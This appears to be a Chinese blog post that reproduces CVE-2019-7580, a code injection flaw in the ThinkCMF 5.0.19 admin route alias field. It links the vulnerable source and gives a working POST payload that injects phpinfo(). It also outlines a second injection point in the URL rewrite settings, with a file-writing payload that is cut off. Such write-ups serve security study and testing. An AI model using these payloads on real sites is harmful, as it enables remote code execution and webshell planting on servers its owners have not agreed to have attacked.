thinkcmf5.0.19漏洞CVE-2019-7580复现

前言

继续复现漏洞,持续关注thinkcmf。

描叙

thinkcmf5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。

过程

  • 搭建环境。

下载地址

https://github.com/thinkcmf/thinkcmf/archive/5.0.190111.zip

  • 攻击脚本
http://thinkcmf5019.wwf/portal/admin_category/addpost.html

parent_id=0&name=111&alias=1'%3D%3Earray(%22%22)%2Cphpinfo()%2C'2

thinkcmf5.0.19漏洞CVE-2019-7580复现_第1张图片
image.png
thinkcmf5.0.19漏洞CVE-2019-7580复现_第2张图片
image.png
  • 类似漏洞

在美化url那里也可以实现同等写入操作
先登录后台->设置->URL美化->添加URL规则->选择规则(这个随便选一个,但必须要从这里面选)->在显示网址处填写我们的payload保存即可。

'.file_put_contents('1.php','
thinkcmf5.0.19漏洞CVE-2019-7580复现_第3张图片
image.png
  • 相关文章

http://www.ttk7.cn/post-108.html

https://xz.aliyun.com/t/3997

你可能感兴趣的:(thinkcmf5.0.19漏洞CVE-2019-7580复现)